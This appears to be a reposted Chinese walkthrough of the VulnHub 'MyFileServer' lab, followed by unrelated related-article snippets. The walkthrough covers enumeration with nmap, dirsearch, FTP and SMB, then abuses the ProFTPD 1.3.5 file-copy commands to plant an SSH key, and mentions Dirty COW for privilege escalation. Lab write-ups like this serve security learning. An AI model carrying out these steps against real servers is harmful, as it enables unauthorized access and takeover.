【精选】MyFileServer (超详细思路过程)

🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【java】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、信息收集

1.主机探测

发现靶机的IP地址是:192.168.3.131

┌──(root💀kali)-[~/桌面]
└─# arp-scan -l

2.端口服务扫描

端口开放了21 22 80 111 445 2049 2121

服务开放了 http,ftp,smb,ssh

┌──(root💀kali)-[~/桌面]
└─# nmap -sS -A -p- 192.168.3.131

然后先访问下web页面,没有发现什么有价值的信息

3.目录扫描

利用dirsearch \nikto \dirb工具扫描目录

目录:/.ssh/authorized_keys、/icons/README/readme.txt

┌──(root💀kali)-[~/桌面]
└─# dirsearch -u http://192.168.3.131nikto -h 192.168.3.131dirb http://192.168.3.131

访问/readme.txt目录

发现一个密码:rootroot1

尝试ssh后发现登录不了,ftp可以利用anonimous用户登录

尝试下载发现很多文件都无法下载,下载来的cron里面也没什么有用的信息

还有一个2121端口也是ftp也登陆看看有没有有用的信息

┌──(root💀kali)-[~/桌面]
└─# ftp 192.168.3.131 2121

log/目录下有很多的目录文件

依旧是权限不足无法下载

4.smb服务

这里还有个文件共享服务Smb 先尝试使用smbmap进行扫描查看文件,发现存在私钥文件 等下生成一个进行替换即可**

┌──(root💀kali)-[~/桌面]
└─# smbmap -H 192.168.3.131

登录smb服务

┌──(root💀kali)-[~/桌面]
└─# smbclient //192.168.3.131/smbdata

get命令在smb服务里面下载文件:

在secure文件中,看到了smb的密码

sshd_config中发现靶机仅仅支持证书登陆,不允许密码登陆

生成私钥:ssh-keygen

┌──(root💀kali)-[~/桌面]
└─# ssh-keygen##保存ssh私钥位置
/root/.ssh/id_rsa.pub

二、漏洞利用

1.漏洞发现(ProFTPD 1.3.5)

┌──(root💀kali)-[~/桌面]
└─# searchsploit ProFTPD 1.3.5

2.漏洞利用

发现存在文件复制漏洞尝试利用:

nc 192.168.3.131 2121
site cpfr /smbdata/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys   # 一般服务创建时会同时建一个smbuser用户

直接ssh登入smbuser用户

3.脏牛提权

查看内核版本,可以使用 脏牛提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/253372.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JVM 类加载机制(七)

1.加载,验证,准备,解析,初始化 ​ JVM 类加载机制分为五个部分:加载,验证,准备,解析,初始化,下面我们就分别来看一下这五个过程。 1.1. 加载 ​ 加载是类加…

强化学习第1天:强化学习概述

☁️主页 Nowl 🔥专栏《机器学习实战》 《机器学习》 📑君子坐而论道,少年起而行之 ​​ 文章目录 介绍 强化学习要素 强化学习任务示例 环境搭建:gym 基本用法 环境信息查看 创建智能体 过程可视化 完整代码 结语…

代码随想录算法训练营第三十六天|01背包问题 二维 ,01背包问题 一维 ,416. 分割等和子集

背包理论基础 01 背包(二维) 有n件物品和一个最多能背重量为w 的背包。第i件物品的重量是weight[i],得到的价值是value[i] 。每件物品只能用一次,求解将哪些物品装入背包里物品价值总和最大。 背包最大重量为4。 物品为&#x…

Python小案例:while练习题

目录 while练习题:1、存款多少年能翻倍2.小球坠落长度计算3、猴子吃桃4、计算:1-23-4...99-100的和 while练习题: 1、存款多少年能翻倍 1万本金,年利息:0.0325,求连本带息多少年能翻倍 解析:…

Codeforces Round 913 (Div. 3) A~E(F,G更新中)

A.Rook(循环) 题意: 给出一个 8 8 8 \times 8 88的棋盘和一个棋子(可以任选上下左右四方向移动任意步数),问一次移动可以到达哪些格子。 分析: 使用for循环对棋子所在的行列进行遍历并输出…

「智慧城市」这一概念科学吗?还是炒作?

智慧城市是一个综合性的概念,它利用信息技术和创新概念,将城市的各个系统和服务集成起来,以提升城市运行效率、优化城市管理和服务,改善市民的生活质量。 具体来说,智慧城市涵盖了许多领域,包括城市规划、建…

数据通信的基础知识

目录 一、物理层的主要功能 二、物理层的特性 三、数据通信的几个术语 四、信道的几个基本概念 1、信道 2、基带信号 (1)基带调制常用编码方式 1)不归零码(NRZ:Non-Return to Zero) 2)…

MATLAB——二维小波的多层重构

%% 学习目标:二维小波的多层重构 %% 案例1 clear all; close all; load woman.mat; Xind2gray(X,map); [C,S]wavedec2(X,3,db4); %二维小波的多层分解 S C(1:38*38)0; %将小波的近似系数设置为0 Ywaverec2(C,S,db4); %二维小波的多层…

MYSQL全语法速查(含示例)

文章目录 1.从简单的查询开始查找所有记录(SELECT *)查找记录中的所有登录名(SELECT)查找登录名为admin的密码(WHERE)查找电话号码非空的记录(IS NOT NULL)查找所在城市为北京或者用户名字是李四的记录(OR)查找所在城市为北京并且用户名字是张三的记录(AND)查找用户名字是李四或…

组件的生命周期

目录​ 1:生命周期和生命周期函数的概念 2:组件创建的过程 3:组件创建阶段beforeCreate,created,beforeMount,mounted生命周期函数。 3.1:beforeCreate方法示例: 3.2&#xff1…

【数据结构】动态规划(Dynamic Programming)

一.动态规划(DP)的定义: 求解决策过程(decision process)最优化的数学方法。 将多阶段决策过程转化为一系列单阶段问题,利用各阶段之间的关系,逐个求解。 二.动态规划的基本思想: …

团队git操作流程

项目的开发要求:(1)项目组厉员代码提交不少于20次 (2)项目组厉员每天提交不少于20次 (3)企业项目开发代码的每天的提交一般提交3-5次 (4)代码仓库的管理 git的基础操作流…

对于多台232modbus仪表低成本通讯的modbus转profinet网关

随着越来越多的仪表设备采用Modbus通信协议,其中又以232 Modbus仪表的应用最为广泛。而为了实现多台232 Modbus仪表低成本通信,Modbus转Profinet网关应运而生。Modbus转Profinet网关不仅能够实现多台仪表之间的数据传输,还能够保证通信的稳定…

【数据结构】——二叉树简答题模板

目录 一、树和二叉树的概念(一)二叉树的定义和性质(二)树和二叉树的区别 二、完全二叉树和满二叉树三、二叉树的遍历(一)由序列确定二叉树(二)不同遍历序列的关系 四、二叉树的性质&…

计算机操作系统3

1.虚拟机 VM 两类虚拟机的对比: 2.进程 进程的特征: 进程状态的转换(五大状态) 3.进程控制原语的作用 4.线程 ​​​​​线程的属性 实现方式 5.调度算法的评价指标

OpenCV-python下载安装和基本操作

文章目录 一、实验目的二、实验内容三、实验过程OpenCV-python的安装与配置python下载和环境配置PIP镜像安装Numpy安装openCV-python检验opencv安装是否成功 openCV-python的基本操作图像输入和展示以及写出openCV界面编程单窗口显示多图片鼠标事件键盘事件滑动条事件 四、实验…

【源码解析】聊聊阻塞队列之BlockingArrayQueue

阻塞队列 阻塞队列:顾名思义 首先它是一个队列,而一个阻塞队列在数据结构中所起的作用大致如下入所示。 当阻塞队列是空时,从队列中获取元素的操作将会被阻塞。当阻塞队列时满的时,往队列里添加元素的操作将会被阻塞。 试图从空的…

全球6G发展大会开幕,为什么我们需要6G

2023全球6G发展大会 由中国IMT-2030(6G)推进组、中国通信学会、重庆两江新区管理委员会联合主办的2023全球6G发展大会今天在重庆两江新区明月湖成功开幕,开幕式上发布了《6G网络架构展望》《6G无线系统设计原则和典型特征》白皮书。 《6G网络…

有向图的拓扑序列(拓扑排序)

给定一个 n 个点 m 条边的有向图,点的编号是 1 到 n,图中可能存在重边和自环。 请输出任意一个该有向图的拓扑序列,如果拓扑序列不存在,则输出 −1。 若一个由图中所有点构成的序列 A 满足:对于图中的每条边 (x,y)&a…

现货白银简单介绍

在贵金属投资领域,现货白银是当前国际上最为流行、交投最为活跃的白银投资方式,其交易市场遍布全球,包括伦敦、苏黎世、纽约、芝加哥及香港等主要市场,是一种以杠杆交易和做市商的形式进行的现货交易。 现货白银可以说是当下交易模…